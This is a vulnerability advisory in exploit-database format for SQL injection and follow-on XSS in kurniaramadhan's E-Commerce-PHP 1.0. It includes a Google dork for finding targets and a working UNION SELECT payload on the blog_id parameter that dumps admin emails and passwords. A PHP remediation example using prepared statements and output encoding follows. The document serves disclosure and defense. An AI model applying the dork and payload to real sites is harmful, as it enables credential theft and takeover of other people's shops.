****************************************************************************************
#Exploit Title: Ecommerce-PHP-kurniaramadhan-1.0 - SQL Injection
#Title of the Vulnerability: SQL Injection to XSS
#Product Name: E-Commerce-PHP
#Vendor: https://github.com/kurniaramadhan/
#Vulnerable Product Link: https://github.com/kurniaramadhan/E-Commerce-PHP
#Date: 2024-12-23
#Exploit Author: Maloy Roy Orko
#Google Dork: "Powered by kurniaramadhan"
#Category: Webapps
#Tested On: Android, Mac, Firefox
## Reference:
https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html
https://portswigger.net/web-security/sql-injection
###Affected Components: Parameters, Admin Panel Create Product Fields.
#Description:
SQL injection in the request parameters of the "E-commerce PHP" application by kurniaramadhan, v1.0, allows a remote attacker to dump the database and gain admin access. It also leads to XSS, because the create product fields in the admin panel are not protected. The attack vectors are all parameters and the create product fields.
###Proof of Concept:
###Demo:
http://192.168.1.100:8080/blog-details.php?blog_id=1+union+select+concat(admin_email,0x3a,0x3c62723e3c62723e3c2f623e41646d696e2050617373776f72643a3c2f623e,0x3c62723e,admin_password),2,3,4,5,6,7,8,9+from+admins--+
###Attack Vectors:
To exploit the vulnerability, an attacker supplies the payload through the parameters and can then dump the whole database or obtain the admin credentials. With those credentials the attacker can log in as admin, and because the create product fields are not protected, XSS can then be exploited there.
###Detailed Blog About The PoC:
https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html
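One way to close the blog_id injection point and the follow-on XSS described above, shown as an added example that is not the project's code or part of the original advisory. The blogs table, its column names, the helper function names and the in-memory SQLite database are assumptions for illustration; only the blog_id parameter comes from this page.

```php
<?php
declare(strict_types=1);
// Added example, not the project's code. The blogs table, its columns and the
// in-memory SQLite database are assumptions; only blog_id is from the advisory.

function parse_blog_id(mixed $raw): ?int
{
    // Accept only a positive integer; anything carrying SQL text is rejected.
    if (!is_string($raw)) return null;
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_blog(PDO $pdo, int $id): ?array
{
    // Bound placeholder: the value never becomes part of the SQL statement text.
    $stmt = $pdo->prepare('SELECT blog_title, blog_content FROM blogs WHERE blog_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function e(string $s): string
{
    // Encode on output so markup coming back from the database renders as text.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_blog(PDO $pdo, mixed $rawId): string
{
    $id = parse_blog_id($rawId);
    if ($id === null) {
        return '400 invalid blog_id';
    }
    $blog = fetch_blog($pdo, $id);
    if ($blog === null) {
        return '404 not found';
    }
    return '<h1>' . e($blog['blog_title']) . '</h1><div>' . e($blog['blog_content']) . '</div>';
}

// Constructed sample data and inputs, so the script runs offline with pdo_sqlite.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE blogs (blog_id INTEGER PRIMARY KEY, blog_title TEXT, blog_content TEXT)');
$pdo->exec("INSERT INTO blogs VALUES (1, 'Sale <b>now</b>', 'Plain text body')");
foreach (['1', '2', '1 union select 1,2'] as $raw) {
    echo $raw, ' => ', render_blog($pdo, $raw), PHP_EOL;
}
```

The same pattern applies to every other parameter the application passes into a query, and the output encoding in e() belongs on every product field the admin panel stores and the storefront later renders.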
*********************************************************
#Discovered by: Maloy Roy Orko
#Website: https://www.websecurityinsights.my.id/
****************************************************************************************